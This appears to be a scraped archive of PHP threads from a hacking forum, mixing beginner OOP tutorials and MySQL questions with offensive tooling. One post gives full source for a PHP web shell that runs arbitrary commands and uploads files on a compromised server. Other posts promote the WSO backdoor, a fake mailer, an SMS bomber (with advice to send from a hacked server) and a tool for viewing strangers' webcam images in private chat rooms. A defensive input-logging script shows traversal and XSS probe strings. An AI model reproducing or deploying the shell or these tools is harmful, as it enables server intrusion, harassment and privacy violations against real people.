PHP - iExploit

Fake Mailer

s1n4 — Sun, 20 Mar 2011 00:59:37 -0400

Hi guys,

You can use of this tool for sending fake email.

Fake Mailer (O_o)

Enjoy :)

how Truncate is an ddl statement in mysql ?

mandi — Wed, 20 Feb 2013 10:31:55 -0500

hi guys,

i have been learning about mysql database technology,while revising the concepts i found this thing confusing to me.

truncate is in ddl command,as far as i know any command that deals with
the structure of table has been classified in to ddl statement,

but truncate in mysql just deletes the table data ,NOT THE STRUCTURE,

this looks like delete to me,the only difference i know between them is
you can not rollback an ddl statement(i.e truncate),but you can
rollback on dml statement(i.e delete),beyond this i couldn't able to
find any difference between them.

can some one explain me this clearly

Anyone know how i can download with PHP??

Mr. P-teo — Mon, 31 Dec 2012 11:55:29 -0500

So i'v been working on my shell for a while now, it works great. File browser etc all perfect but i cant seem to get it to download files :/ If anyone would be able to help me with this then that would be great.

[php] wso 2.5.1

Andr4y — Sat, 29 Dec 2012 14:11:14 -0500

WSO is a PHP shell backdoor that provide an interface for various remote
operations. It can perform everything from remote code execution,
bruteforcing of servers, provide server information, and more.

Download (packetstorm) Link :

http://packetstormsecurity.org/files/117974/WSO-Web-Shell-2.5.1.html

Features:

Authorization for the cookies

Server Information

File manager (copy, rename, move, delete, chmod, touch, create files and folders)

View, hexview, editing, downloading, uploading files

Working with zip archives (packing, unpacking) + compression tar.gz

Console

SQL Manager (MySql, PostgreSql)

Execute PHP code

Working with Strings + hash search online databases

Bindport and back-Connect (Perl)

Bruteforce FTP, MySQL, PgSQL

Search files, search text in files

Support for * nix-like and Windows systems

Antipoiskovik (check User-Agent, if a search engine then returns 404 error)

You can use AJAX

Small size. Packaged version is 22.8 Kb

The choice of encoding, which employs a shell.

Changelog (v2.5.1):

Remove comments from the first line .

Added option to dump certain columns of tables.

the size of large files are now well defined .

in the file properties field "Create time" changed to "Change time" (http://php.net/filectime).

Fixed a bug that caused not working mysql brute force if there was a port of the server .

Fixed a bug due to which one can not see the contents of a table called download in the database.

Youtube link :

[RELEASE] VISP Chat-Room Script + Uses Javascript(jQuery), SQL, PHP

Mr. P-teo — Sun, 08 Apr 2012 15:24:53 -0400

So here it is guys, iv been doing this on and off for a while now but i thought i would release my chat room script. Its fairly simple but works quite well. Iv also put most of the code into classes so it is layed out much nicer.

There are a few issues that i was unable to fix but on the whole it works well.

Here is a screen shot:
[spoiler]
http://imgnow.tk/u/943415726.png
[/spoiler]

Don't worrie about the \n in the messages on the image, that was just m playing around, its all sorted now.

Known Issues:
[list]
[*]Clear textarea after message is sent[/*:m]
[*]End Session when they exit the page[/*:m]
[*]Might not layout the same in all browsers.[/*:m][/list:u]

As you can see they aren't massive issues although they do cause a bit of an annoyance. The layout issue is with internet explorer but it works fine with chrome and firefox.

Anyway how some people will find it useful.

Download: http://www.freefilehosting.net/vispwebchat_1

free hosting sites

cyberpirate — Sun, 03 Jun 2012 06:55:13 -0400

As I saw many new programmer always search for the good and free web hosting for the php so I just did some work for them. Here are some free php webhosting sites:-
www.000webhost.com
www.110mb.com
www.zymic.com
www.biz.nf
www.x10hosting.com
www.biz.ht
I like the 000webhosting because its give the best hosting plan for free as compared to others..:D:D.. Enjoy..:)

OOP versus Procedural Programming

cyberpirate — Sun, 03 Jun 2012 06:40:10 -0400

Hey Guys !!!! Normally I am busy. But today I got some free time so I
think I should write something about the OOP programming approach and
Procedure Programming approach. Because many new programmer like me
always get confuse between OOP because we create primarily procedural
code.

Lets understand these one by one and understand the differences. :)

In procedure programming approach or procedure oriented approach, the
problems is viewing in a sequence of things or tasks. And these tasks
are accomplished by the functions or we can say that we write the
functions to accomplish these tasks. This approach basically consists of
writing a list of instructions and organizing these instructions into
group known as function. In this approach because we concentrate on the
development of the functions thats why very little attention is given to
the data.

While in the OOP data is treated as a critical elements in the program
and does not allow it to flow freely in the system. OOP allows
decomposition of a problem into a number of entities called objects and
then build data and functions around these objects. So this the basic
definition of OOP and Procedure programming or we can say that basic
difference between them. Now lets get some more about these:-

Functions are Code-Centric which means that data first sent as input and
then return as output. While OOP is Data-Centric which means that data
is internally represent and contains the functionality or method. In OOP
objects contain data and behavior simultaneously while Function contain
data and function separated.

OOP require a different way of thinking about how you construct your
applications.OOP is basically all about Classes and Objects. Lets
understand the concept of OOP one by one.

To understand OOP let us take an example of a car. A car have its own
color,weight, manufacturer, gas tank etc. Those are its characteristics.
While a car can accelerate,stop,sound for horn etc. Those are its
behavior. And a car is itself a class which have characteristics and
behavior. A class is basically nothing but a unit of code. Now lets
come again on our example of a car.

The characteristics of car are known as its properties. Properties have a
name and value and they may be vary or not. Like we can change the
color of a car by giving its new paint job. So, what are properties in
OOP these are nothing but the variable declared within a class. Which
have its own name and value. These properties can be variable or
constant or static. And the behavior of a class is also known as method.
And we can say that a method is nothing but it its similar to a
function which we normally used in procedural programming.

Some concept of OOP are given below:-

Classes:-As we say that classes are nothing but the
code which defines the properties and method. Class in PHP contains
three main components: a members,method and a constructor. A member is a
piece of data that an object can contains. In our car example color and
manufacturer are members of class car. Methods are the services which
are provided to client by the object or we can say that method are
functions. A method is also known as member function. And a constructor
is special method that initialize the objects into its ready state.

Example of how to define a class in PHP is given below:-

class demo { // class is keyword used in php to declare a class and demo is class name here.

}

?>

Objects:- Objects are the entities constructed by a class.
It is an instance of the class. The process of building an object from a
class is known as instantiation.A class can have more than one object.
An example for object is given below:-

$objdemo=new demo(); // here we define a object for class demo using keyword new. New keyword is used to define a object for a class.

?>

Inheritance:- Inheritance is process by which objects of one
class acquire the properties of the objects of another class or we can
say that parent class. Inheritance provides the idea of reusability. We
can reuse a code either by copy it and paste it in another or by using
Inheritance. The copy paste method have major problem is that if we
found an error in our main code then we have to debug all the pasted
code. Thats why its good to use Inheritance and by using it we can
modify a code without changing its main properties. Extends keyword is using for Inheritance. Example of Inheritance is given below:-

class media {

---declare some members----

function somefun(){

--some code---

}

}

class books extends media {

----some new members for books class which is subclass of media class---

function somenewfun()

{

--code for new methods for books class--

}

}

?>

Here in this example I used two class one is media which is our parent
class and another is book which is our subclass. The subclass book have
all the properties and methods from the parent class media and it is
also have its own properties and methods which we declare in the book
class. The extands keyword is used to Inherit all the properties and methods of parent class to its subclass.

NOTE:- Don't forget to change the lines --declare
members-- or --code for method-- to your original logic before running
the program in PHP.

I think this is sufficient for this section. Others properties like
polymorphism and access methods for a class is given to the next
section. Thanks for tolerating me this long time..:p;).. Hope this will
be helpful for some of you guys..:).. Thank You all..

A simple Calculator Example Using OOP

cyberpirate — Sun, 03 Jun 2012 15:14:50 -0400

A simple code for a calculator using OOP approach is given below..;)..

Its a simple calculator Program using OOP approach.

Calculator

class calc {         //declaring a class with name calc
private $txt3;        //declaring a private property for class calc, which can be access with in the class and hide from outside world.
public function setdata($txt1,$txt2) {   //declaring a method to set the data for the property.
if($txt2=='0')                           //To check if the value of second number is zero or not. If it is zero then print the error message.
{
echo "Error:-Second number must be a digit except a 0 !!!";
$this->txt3='Error';
}
elseif($_POST['cal']=='add')       //To check if add is selected or not when submitting a form. If it is selected go with in the if and do addition.
{
$this->txt3=$txt1+$txt2;           //Use of this variable to refer txt3 to itself.
}
elseif($_POST['cal']=='sub')       //To check if sub is selected or not when submitting a form. If it is selected go with in the if and do substraction.
{
$this->txt3=$txt1-$txt2;
}
elseif($_POST['cal']=='mul')   //To check if mul is selected or not when submitting a form. If it is selected go with in the if and do multipliction.
{
$this->txt3=$txt1*$txt2;
}
else                           //this is the else statement for the divide.
$this->txt3=$txt1/$txt2;
}

public function getdata()       //declaring the method to show the output.
{
echo "

Result is: $this->txt3

";
}
}
$obj1=new calc(); //creating an object for class calc to provide service to the client.
$obj1->setdata($_POST['txt1'],$_POST['txt2']); //calling the object method to set the data with arguments passed by the user using form.
$obj1->getdata(); // calling the object method to get the output.
?>

All of the code is explained before or using the comments in the code. Thus I am not going to explain it again...;).. Thank you..:).. Hope this will help you guys..:)

OOP Versus Procedure Programming Part2

cyberpirate — Sun, 03 Jun 2012 14:58:54 -0400

As we discussed about OOP basic concepts in Previous section. Now let us understand some more concept. If you ar not aware about what is OOP then please read my previous
thread. :)

Polymorphism:-It is another important concept for the OOP. The word is taken from a GREEK language which means the ability to take more than one form. In polymorphism a operation may exhibit different behavior in different instances. If you read my previous blog carefully you know about behavior and instances. Now let us understand this polymorphism with help of a simple example:- Let us suppose we have to add two numbers than in case of two numbers the result is a third number which is sum of the two numbers. But what happen in case of strings. In case of two strings we have concatenation the two strings. The process of making an operator to exhibit different behaviors in different instances is known as operator overloading.

Adding a property and method to a class:- This is very easy to add a new propety to our class we simply have to declare a variable inside the class to hold the value of property. The same is done for the method except in adding a method we have to declare a function. Example for this is:-

class demo{
public $prop;      //we are adding a property here.
function getdata() {
print "hello $this->prop is new property!!";
}
}
$obj1=new demo();
$obj2=new demo();
$obj1->prop='cyberpirate';
$obj1->getdata();
$obj2->prop='iexploit';
$obj2->getdata();

?>

Now in this code two new things come into play in this statement 'print "hello $this->prop is new property"'. Now you guys may be thinking that what is this bullshit here in this line. Let us understand it here -> is an operator which is used to access the method and property. If anyone familier with c++ then he knew about dot operator which is used to access the property of the class. Here -> this operator is doing the same thing. And the another is variable $this it is used to refer to the current instances.Like in the above example we used two objects but we dont know in advance what is the name of the objects thats why we used $this variable because $this variable allows each object to access its own properties and methods whiout having to know the name of the variable that represents in the exterior program. We never use a $ sign in front of a property when we have to access this property using $this and ->.
Note:- We used three keyword to protect our data from the external world. These are public, private and protected. Let us understand these one by one:-
public:- This keyword is used to declare a property as a public property which means you can access this property outside the class. One example of this keyword is given above.
private:- This keyword is used to declare a property as a private property which means we can not access this type of property outside the class. Now change in above example use private in place of public and then see what happens.
protected:-This keyword is used to declare a property as a protected property which means we can not access this type of property outside the class. But we can access it with derived objects or in other words we can say that in inheriting class.

Constructors:- A keyword _construct is used in constructor method. It is automatically used to perform various initialization such as property initialization. Example:-

class demo {
public $name;
public function _construct($name) {   //construct function to initialize
$this->name=$name;                   // initialization of data
}
function getdata () {
echo "Hello $this->name";
}
}
$obj1=new demo();
$obj1->_construct('iexploit');
$obj1->getdata();

?>

Destructors:- This is used to delete a object or remove it from the system memory when a request is completed running. To do so just create a function called _destruct with no parameters. Before destroying an object it automatically save the data. Suppose we are working with the database then before destroying an object for this database it update the database if changes are made. It means if any properties of the object is changed, they are automatically saved backt to the database when object is destroyed.

I think this sufficient for this section. In the section I am going to show you guys a simple calculator application with OOP approach..:).. Thanks again. And feel free to comment your comment will encourage me to post more threads for this section..:)

about autosubmission of form need help

cyberpirate — Thu, 17 May 2012 10:18:00 -0400

Can anybody help me?? i want to write a auto submission script in php.. So that a script can easily submit a form automatically.. I dont have any idea can anybody help me..

Detecting possible hacking attempts

chroniccommand — Sat, 12 Mar 2011 03:48:21 -0500

Hey just figured I'd show you a simple way to detect possible hacking attempts. I'll be using a page with a text box that echoes input and logs possible XSS,SQLi, LFI and RFI

First we create a file named ip_logs.txt and chmod it so the other file can append/write to it. Now we create the php file with the input box.


<?php
if(isset($_GET['input']))
{
$page = $_GET['input'];
$logfile = \"ip_log.txt\"; //Catch hacking attempts
$file = fopen($logfile, 'a');
$ip = $_SERVER['REMOTE_ADDR']; //Get current IP
$curpage = $_SERVER['PHP_SELF']; //Get the page
$input = $_SERVER['QUERY_STRING']; //Get the query used
$writes = \"\nIP: \" . $ip . \"    Page: \" . $curpage . \"    Attempt: \" . $input;
if(strstr($page, '<')) //Detect possible start of <script> or any other tag
 {
   fwrite($file, $writes); //Write IP,Page and attempt string
   fclose($file);
   die(\"Hacking attempt detected. IP logged\"); //Kill the script
 }
elseif(strstr($page, \"'\")) //Detect possible SQLi probe
 {
   fwrite($file, $writes);
   fclose($file);
   die(\"Hacking attempt detected. IP logged\");
 }
elseif(strstr($page, \"../\")) //Detect possible LFI's
 {
   fwrite($file, $writes);
   fclose($file);
   die(\"Hacking attempt detected. IP logged\");
 }
elseif(strstr($page, \"./\")) //Another possible LFI(Current directory transversal)
 {
   fwrite($file, $writes);
   fclose($file);
   die(\"Hacking attempt detected. IP logged\");
 }
elseif(strstr($page, \"http://\")) //Detect possible RFI
 {
   fwrite($file, $writes);
   fclose($file);
   die(\"Hacking attempt detected. IP logged\");
 }
elseif(strstr($page, \"https://\")) //Another possible RFI using secure HTTP
 {
   fwrite($file, $writes);
   fclose($file);
   die(\"Hacking attempt detected. IP logged\");
 }
else
 {
   echo $page;
 }
}
?>
<html>
<body>
<form name=\"input\" method=\"get\">
Text: <input type=\"text\" name=\"input\" />
<input type=\"submit\" value=\"Submit\" />
</form> 
</body>
</html>

Yes, not the best approach to it. The better approach would be to use an array or regex search. But anyway it's pretty simple. Here is a sample ip_log.txt:


IP: ::1    Page: /t.php    Attempt: input=%3Cscript%3E
IP: ::1    Page: /t.php    Attempt: input=%27
IP: ::1    Page: /t.php    Attempt: input=%27
IP: ::1    Page: /t.php    Attempt: input=..%2F
IP: ::1    Page: /t.php    Attempt: input=..%2F..%2F..%2Fetc%2Fshadow
IP: ::1    Page: /t.php    Attempt: input=http%3A%2F%2Fgoogle.com%2F

need some php/sql help

Mr. P-teo — Sun, 25 Sep 2011 20:20:09 -0400

so im playing around with php and sql and i was wondering if anyone could help me, i want to run an sql command and it to return me the table name's, i tryed googleing but i dont exactly know what im searching for. Im using this but it doesnt work:


if($login){
mysql_connect(\"localhost\", \"root\", \"\");
mysql_select_db(\"users\");
echo \"Fetching Data...\";
$collect = mysql_query(\"SELECT * FROM INFORMATION_SCHEMA.COLUMNS\");
echo $collect;

}

any help?

Need a little help with sourcex update

Mr. P-teo — Tue, 20 Sep 2011 22:52:39 -0400

So basically i have found something that could be used as malicious to my site, i have found that people can just submit any image with any link so i was wondering how can i edit this code so it block's certain website links


$submit = strip_tags($_POST['submit']);
$url = htmlentities(strip_tags($_POST['url']));
$img = htmlentities(strip_tags($_POST['img']));
					 
					 if ($submit)
					 {
					 
if ($img&&$url)
{


    //open database
    $connect = mysql_connect('host', 'user', 'pass');
mysql_select_db('database');
    mysql_query(\"

    

    echo \"<em>Banner Added, We hope you get large amounts of traffic.<br><br><img src=\".$img.\" width='125' height='125' ></em>\";

}else {
	echo \"Please fill all field's Correctly.\";
}
}

I would like to edit it so that if the link contains virus/porn etc it to echo Invalid or Malicous Link. I thought that it could stor a whole list of bad links in an array and check through to see but i dont know how to do that.

Any help.

P.S Iv hidden My SQL query

Just Another guy asking suggestion for learning php

mandi — Tue, 23 Nov 2010 20:28:42 -0500

Suggest me a best book for understanding the basics of php,
For now i am looking to build a strong base in the php and it's basics,

I am willing to learn php for "web-security" related things,not for professional purposes like web-designing,

Do i need to learn Object oriented part of the php as well?

Also i heared majority of the web-sites on the internet(like 60-70%) has been coded with php,so learning php will feed my needs?

or do i need to learn other languages like html and asp as well?

if not please advice me,what i should do and what i should not do,

Also suggest me a Good e-book for beginning php....

hope i will get some "worthy" advice..

SourcEx - Looking for help from PHP Coder for SourcEx

Mr. P-teo — Wed, 10 Aug 2011 14:38:25 -0400

Hey p-teo here. Im looking to recruit a php coder who knows what they are doing. Why?

I have a website called SourcEX http://www.sourcex.info/ and iv had many people telling me that it is good idea and what improvements they would like to see on this site. Unfortunately im not good enough for some of the stuff they would like to see.

Suggestions:
- Advanced Search
- Top Uploaders Page
- A Paste bin form to submit from my site.

As you can see, some of the ideas they would like to see are quite complex, hens i have come looking for help.

So will you get paid?

Well the answer is no, currently the website is not generating any income as it has only been live since 5th august. But your will be fully recognised as one of the website creators/admins.

If you would like to help or get in contact with me about this then make a post or PM me.

simple php shell

schumbag — Sun, 14 Aug 2011 22:17:58 -0400

i also do not know how this code can be up to the land of china and I think this is simple and easy coding quite happy if someone likes my work:)

<html>
<head>
<body text=\"#00ff00\" bgcolor=\"#000000\">
<title>cakill schumbag</title>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">
<center><font face=\"trebuchet ms\" size=\"4\"><b>Created By cakill-schumbag </b></p></center>
<?php
print \"<style>body{text:#999999;bgcolor:#000000;font-family:tahoma ms;font-size:15px;}hr{width:100%;height:2px;}</style>\";
print \"<center><h1>thank's 4all keluarga laknat</h1></center>\";
print \"<hr><hr>\";
closelog( );
$user = get_current_user( );
$login = posix_getuid( );
$euid = posix_geteuid( );
$ver = phpversion( );
$gid = posix_getgid( );
if ($chdir == \"\") $chdir = getcwd( );
if(!$whoami)$whoami=exec(\"whoami\");
?>
<TABLE BORDER=\"0\" CELLPADDING=\"0\" CELLSPACING=\"0\">
<?php
$uname = posix_uname( );
while (list($info, $value) = each ($uname)) {
?>
<TR>
    <TD align=\"left\"><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b><span style=\"font-size: 9pt\"><?= $info ?>
      <span style=\"font-size: 9pt\">:</b> <?= $value ?></span></DIV></TD>
</TR>
<?php
}
?>
<TR>
<TD align=\"left\"><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>
    <span style=\"font-size: 9pt\">User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</span></DIV></TD>
</TR>
<TR>
<TD align=\"left\"><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>
    <span style=\"font-size: 9pt\">Server Services:</b> <?= \"$SERVER_SOFTWARE $SERVER_VERSION\"; ?>
    </span></DIV></TD>
</TR>
<TR>
<TD align=\"left\"><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>
    <span style=\"font-size: 9pt\">Permision Directory:</b> <? if(@is_writable($chdir)){ echo \"Yes\";

}else{ echo \"No\"; } ?>
    </span></DIV></TD>
</TR>
<TR>
<TD align=\"left\"><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>
    <span style=\"font-size: 9pt\">Server Address:</b> <?= \"$SERVER_ADDR $SERVER_NAME\"; ?>
    </span></DIV></TD>
</TR>
<TR>
<TD align=\"left\"><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>
    <span style=\"font-size: 9pt\">Current User:</b> <?= $user ?></span></DIV></TD>
</TR>
<TR>
<TD align=\"left\"><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>
    <span style=\"font-size: 9pt\">PHP Version:</b> <?= $ver ?></span></DIV></TD>
</TR>
</TABLE>
</b>
</div></font></div>
<?php

set_magic_quotes_runtime(0);

$currentWD = str_replace(\"\\\\\",\"\\\",$_POST['_cwd']);
$currentCMD = str_replace(\"\\\\\",\"\\\",$_POST['_cmd']);

$UName = `uname -a`;
$SCWD   = `pwd`;
$UserID = `id`;

if( $currentWD == \"\" ) {
    $currentWD = $SCWD;
}

if( $_POST['_act'] == \"List File\" ) {
    $currentCMD = \"ls -la\";
}

if( $_POST['_act'] == \"IP\" ) {
    $currentCMD = \"/sbin/ifconfig|grep inet\";
}

if( $_POST['_act'] == \"Proses\" ) {
    $currentCMD = \"ps -wx\";
}
if( $_POST['_act'] == \"Memory\" ) {
    $currentCMD = \"free\";
}

if( $_POST['_act'] == \"777\" ) {
    $currentCMD = \"find / -perm 777 -type d\";
}

if( $_POST['_act'] == \"nobody\" ) {
    $currentCMD = \"find / -user nobody -type d\";
}

if( $_POST['_act'] == \"apache\" ) {
    $currentCMD = \"find / -user apache -type d\";
}

if( $_POST['_act'] == \"httpd\" ) {
    $currentCMD = \"find / -user httpd -type d\";
}

if( $_POST['_act'] == \"www\" ) {
    $currentCMD = \"find / -user www -type d\";
}

if( $_POST['_act'] == \"www-data\" ) {
    $currentCMD = \"find / -user www-data -type d\";
}

print \"<form method=post enctype=\\"multipart/form-data\\"><hr><hr><table>\";

print \"<tr><td><b>Command:</b></td><td><input size=100 name=\\"_cmd\\"

value=\\"\".$currentCMD.\"\\"></td>\";
print \"<td><input type=submit name=_act value=\\"Run\\"></td></tr>\";

print \"<tr><td><b>Directory:</b></td><td><input size=100 name=\\"_cwd\\"

value=\\"\".$currentWD.\"\\"></td>\";
print \"<td><input type=submit name=_act value=\\"List File\\"></td></tr>\";

print \"<tr><td><b>Upload file:</b></td><td><input size=88 type=file name=_upl></td>\";
print \"<td><input type=submit name=_act value=\\"Upload\\"></td></tr>\";

print \"<tr><td><b>Find:</b></td>\";
print \"<td><input type=submit name=_act value=\\"IP\\"><b> <b><input type=submit name=_act

value=\\"Proses\\"><b> <b><input type=submit name=_act value=\\"777\\"><b> <b><input type=submit

name=_act value=\\"nobody\\"><b> <b><input type=submit name=_act value=\\"apache\\"><b> <b><input

type=submit name=_act value=\\"httpd\\"><b> <b><input type=submit name=_act value=\\"www\\"><b>

<b><input type=submit name=_act value=\\"www-data\\"></td></tr>\";

print \"</table></form><hr><hr>\";

$currentCMD = str_replace(\"\\\\"\",\"\\"\",$currentCMD);
$currentCMD = str_replace(\"\\\'\",\"\'\",$currentCMD);

if( $_POST['_act'] == \"Upload\" ) {
    if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
        print \"<center><b>Error Upload Failed!!!</b></center>\";
    } else {
        print \"<center><pre>\";
        system(\"mv \".$_FILES['_upl']['tmp_name'].\" \".$currentWD.\"/\".$_FILES['_upl']['name'].\" 2>&1\");
        print \"</pre><b>Upload File Succes!!!</b></center>\";
    }   
} else {
    print \"\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n\";
    $currentCMD = \"cd \".$currentWD.\";\".$currentCMD;
system(\"$currentCMD 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm
/tmp/cmdtemp\");
    print \"\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Cakill-Schumbag</b></center>\";
}

exit;

?>

and this from source
http://hi.baidu.com/myetcat/blog/item/5 ... af14e.html

Lookup Code

Null Set — Mon, 01 Aug 2011 10:54:48 -0400


<!-- This is a simple resolver designed for local use						-->
<!-- Not advised to be put on any site without adding some security features-->
<!-- Coded by Null Set (1 Aug 2011)											-->
<!-- Submitted originally to securityoverride.com							-->


<?php
if(isset($_POST['ip'])){
	$ip = $_POST['ip'];
	$hostname_result = gethostbyaddr($ip);
	echo $ip.\" has hostname \".$hostname_result.\"<br /><br />\";
}
if(isset($_POST['addr'])){
	$addr = $_POST['addr'];
	$ip_result = gethostbyname($addr);
	echo $addr.\" has IP \".$ip_result.\"<br /><br />\";
}
?>

<form action='' method='POST' name='ip'>
	IP Address to check: <input type='text' name='ip' /><input type='submit' value='Submit!' />
</form>
<form action='' method='POST' name='addr'>
	Hostname to check: <input type='text' name='addr' /><input type='submit' value='Submit!' />
</form>

Hope you enjoy this. Can also be found at http://pastebin.com/ZfJT1ygz

SMS / Email Bomber

xpl0yt — Mon, 28 Mar 2011 18:12:36 -0400

Sup, here is a SMS bomber i wrote in php that works on most major american phone carriers. Have fun and make sure you use a hacked server when dropping 10k SMS to someones phone. If anyone lives in the uk please send me the info for their major phone carriers or modify's it theirself please re-post it.

http://pastie.org/1436978

IP Logging Script

SomethingMAD — Sat, 23 Oct 2010 23:16:31 -0400

Download it :

http://ul.to/xp321f
http://mcaf.ee/6b340
http://mcaf.ee/fd43e
http://mcaf.ee/ba971
__________________

"TinyChat Creeper"

xpl0yt — Mon, 04 Apr 2011 00:07:38 -0400

This is a tool that i wrote for T1NYCH4T which allows you to remotely view images, and usernames of people that are in tinychat rooms "even works on passworded ones". The source is highly commented to help out anyone wanting to learn PHP, some of the methods would be considered "Ghetto" or "Hackish" but i am not a web developer nor html scripter. The speed of the code executes extremely fast but i am sure it could use some optimization.

A live demo of this project can be viewed/used here - TinyChat Creeper
The css can be viewed here -CSS
The Password is: fadetoblack

Once you are logged in you will be presented with four input box's, one checkbox and a button.
The enter a T1nyCh4t room name you wish to creep, and a image number from 0 - 4 "note the T1nyCh4t server stores 5 images of everyone that is on web cam", and you can change the default image size if you so wish. When the Username checkbox is pressed it will also generate a list of users in the room, create a table and place them into 3 columns. If the username is cam their name will turn into a hyperlink which will take you to the source of their image.

The code may have a few bugs or glitches if any are found please report them here.

please excuse the formating both websites messed it up a bit. - best viewed at pastie.

The Code At Pastebin
The Code At Pastie